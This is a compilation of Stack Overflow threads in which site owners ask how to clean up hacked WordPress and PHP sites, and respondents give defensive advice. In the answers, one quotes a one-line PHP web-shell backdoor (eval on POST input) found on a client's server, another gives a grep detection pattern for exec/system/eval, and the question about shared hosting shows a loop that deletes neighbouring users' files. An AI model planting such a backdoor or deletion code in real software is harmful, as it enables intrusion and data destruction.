Closed. This question is off-topic. It is not currently accepting answers.
Want to improve this question? Update the question so it's on-topic for Stack Overflow.
Closed 10 years ago.
Improve this question
I have the following problem:
The website I made for a friend has been infected with malware. When I tried to clean it, by replacing files that I found to be different to the ones I uploaded, with my original files, after a short time, the files were different again. The file permissions are all 644, and the folders 755. It is as if the one who infected the files has access to change them whenever I change them back. Can anyone help me since I am very new to this kind of problems?
First things first: report this to your webhost immediately! Secondly change all of your relevant passwords!
That being done, there are a few possible causes:
Your parent webhost has been compromised, in which case there is nothing you can do except move to a better host.
Your website contains a vulnerability that is being picked-up by kiddies with their vuln-scanners. Be sure to audit your code to ensure that no user action can result in your website's filesystem being touched inappropriately; also check for SQL injection avenues.
Your website uses a widely-distributed application, such as WordPress, that has not been patched - this is a major problem.
Your own PC has been compromised and ne'erdowells have used a keylogger or other software to discover your FTP or SSH account details, and are abusing your website. Run a local scan and audit everything to ensure your bank account is being raided either.
This isn't a code-related problem. This isn't the place for your question.
But: It's likely that a program is running on your server and re-infecting the files. I'd recommend either taking it to a professional malware removal service, or (my preference) burning the server in a fire and allowing a new server to rise from the ashes. Then install an AV suite on the new server.
Related
Closed. This question needs to be more focused. It is not currently accepting answers.
Want to improve this question? Update the question so it focuses on one problem only by editing this post.
Closed 7 years ago.
Improve this question
Yesterday i got a bug in my wordpress site, where hacker injected a script which can be seen by googlebot only.
That script is not read or identified on normal browsers.
This is not causing issues site availability or performance but on google search it gives advertisements instead of my site content. which is not good.
while searching on google i got this
https://aw-snap.info/articles/spam-hack-wordpress.php
I tried almost all the options given there.
Can anybody help me to identify the spam?
Thanks
Kiran Peshkar
Google offers a "view as Google" option in webmaster tools. This will help you to see what they see.
I tend to do two things if recovering one of my sites is not obvious what has caused the problem.
Upload a fresh copy of WordPress to my server. This will overwrite all the core files so if any have been hacked the malicious code will be overwritten.
It is likely that a malicious script is hidden somewhere so if it is a simple site I will delete everything and reinstall and re upload plugins. Of course anything in wp-content will need to be saved and restored. But note, a malicious script could be hidden in here.
It might just be easier to do a full restore at this point. Find a recent backup, upload the files and check with Google's tool to see if the malicious code is still active. It is always worth contacting your webhost for help, depending on how good they are they might even sort this out for you.
Remember, any attempt to restore or overwrite files could potentially impact your site or result in data loss so make sure you backup everything you need. Although it is unlikely the malicious code is in the WordPress database you should definitely back this up too.
Unfortunately there is no easy way to remove these types of hack, you never quite know what malicious code has been used. You should consider changing all passwords and reviewing your security so that the hacker doesn't do the same thing again as soon as you get the site up! Make sure all apps on the server are up to date.
Even the most secure WordPress sites get hit from time to time, this is why security is important and why daily backups are essential.
Closed. This question does not meet Stack Overflow guidelines. It is not currently accepting answers.
This question does not appear to be about a specific programming problem, a software algorithm, or software tools primarily used by programmers. If you believe the question would be on-topic on another Stack Exchange site, you can leave a comment to explain where the question may be able to be answered.
Closed 7 years ago.
Improve this question
I got trouble with some hackers, they hacked into our website, so I cloned our server to a new one, and then reset the github on that server.
I heard about rsync can find out what is different about 2 servers. Is it possible for rsync ? Can I export that list of files to a text file?
Thanks your help, got hacked by use old version of wordpress >_< I was crazy with this from last couple days.
The comment by Marty is good - the rsync command as written will do a dry-run (-n) to show you what files were added/deleted/changed between the $TARGET and $SOURCE locations so you can then inspect or diff them to see if there is any malicious code.
Additionally, in the past when I've dealt with hacked WordPress installs, it is important to find the exploitation vector. Often times PHP shells get uploaded via some insecure script or plugin which gives the attacker a command based web shell to view files and run commands etc.
To find these files, the following command is helpful:
grep -E '(?:(shell_)?exec|system|eval)' /path/to/wordpress/* -R
This might yield something like:
wpte.php: eval($_POST['p1']);
Which in this case, wpte.php was a malicious PHP shell script that got uploaded to one of my client's servers that someone then used to run commands and upload more files. These scripts usually use one or more functions like eval or shell_exec to run commands input from the web shell.
Going from there, you can check the server access logs for hits to the malicious script and then further search the logs for the IP address(es) that accessed that script to potentially find how the uploaded the script or other hits resources they accessed.
Closed. This question does not meet Stack Overflow guidelines. It is not currently accepting answers.
This question does not appear to be about a specific programming problem, a software algorithm, or software tools primarily used by programmers. If you believe the question would be on-topic on another Stack Exchange site, you can leave a comment to explain where the question may be able to be answered.
Closed 9 years ago.
Improve this question
Seomeone placed script in my site that send email, how I cant found this script ?
I use parallels and Linux CentOs.
I'm search keyword in site "mail(", but also cant be that code is like hash
It could be anywhere, and it could be anything. It could even have been deleted.
We did have a situation a while back where a client lost control of their password due to a keylogger and someone was uploading a CGI script to spam emails, running it then deleting it. We only found out via FTP logs what was going on.
Try checking your ftp logs, web server logs and if all that fails and you are sure it is php then try searching for eval( as that is an often used tactic to hide what a script is doing.
More importantly though, my suggestion would be to get someone who is experienced in server management to have a look at your site as a matter of urgency. If they were able to upload a file to your site once, then even if you remove it, it won't stop them doing it again until you find exactly how they were able to do it.
You might also have a look at your scripts. Is there a contact form somewhere on your site? You might have not escaped userinput very well, which gives an attacker the ability to send mails to other recipients.
I had a similar situation in my early days until the host blocked the script and told me to fix it.
Closed. This question is off-topic. It is not currently accepting answers.
Want to improve this question? Update the question so it's on-topic for Stack Overflow.
Closed 10 years ago.
Improve this question
Not much ago I upgraded to a dedicated server, and I order to make it more cost efficient for me, I decided rent some space on the server to people I know (friends, family). Some of the people I know have some other guy that is in charge of the website development, and I want to protect myself from an unauthorized access to my, or any of the other guys I rented to.
One of the cases which concerns me the most is PHP getting access to other users or me by accessing ../ from their root.
For instance, they could do something like this: foreach(glob('../*/*.*') as $some_file){unlink($some_file);} which would delete all the files from a sibling user.
How do I avoid people from doing this sort of things?
This sounds like an issue that can be resolved through system administration.
Edit your php.ini file, restricting the values in open_basedir
Make sure your users are assigned to different groups
chmod your home directories og-wx (e.g. 744, 740, 700, etc...)
Run multiple instances of apache server, possibly under different users/groups
It really depends on how much effort you want to put into it and how robust the security needs to be.
http://www.php.net/manual/en/ini.core.php#ini.open-basedir
http://wiki.apache.org/httpd/RunningMultipleApacheInstances
You should consider dctrucker post on permissions and make sure the apache process if you are running php with mod_php or the php processes if you are running it on fast-cgi dont have the permissions to change permissions. I wouldnt advice the base_opendir approach if security is your concern because then one can just use ini_set to override it (so if using that approach you should disable ini_set as well ).
Closed. This question is off-topic. It is not currently accepting answers.
Want to improve this question? Update the question so it's on-topic for Stack Overflow.
Closed 11 years ago.
Improve this question
I'm sorry if this is not really an appropriate question to ask on here, but this has happened to me a number of times and I don't understand what's going on because I do not have an upload form on my website. Somehow someone is uploading lots of PHP files to my FTP server. These files were even picking up traffic thru Google Analytics. I have a contact form, and it does need to be beefed up security wise, but can a hacker UPLOAD files and alter my .htaccess file through it?
What type of hack is that? I would love to do more research on it to take preventative measures.
It is very possible for a hacker to upload files through a PHP site. I've seen it many times.
PHP has the potential to be very insecure. Getting in through PHP isn't very hard if your configuration is weak. Check your access logs and look for anything that seems wrong, particularly a whole bunch of requests from a single IP address. If they are in that deep, your access log may itself be compromised, and beyond even that.
Contact forms and database driven pages are easy to create with vulnerabilities, and no amount of PHP configuration tweaking will fix that. Look for cross-site scripting vulnerabilities, If you're using a database, SQL Injection attacks, and make sure that there is nowhere in your website that uses a GET parameter in a file path, like reading a file, or writing a file. Don't count on stripping a GET parameter, don't count on regexing it clean, just don't do it.
With regard to FTP, if you can, just turn it off and only upload files through SFTP or SCP. If possible, don't use password authentication, use public key instead.
Ultimately if they are changing files on your file system, you may end up saving yourself time by fixing any vulnerabilities you can find, re-installing the OS from scratch, and reconfiguring PHP and FTP to be secure.
There are some toolkits out there than will do basic tests against your site that are worth a look too. Check out https://www.owasp.org/index.php/Main_Page
Does the form have an upload function? Do you check file types etc? Could easily upload a PHP shell(c99, c100) and alter whats on your account.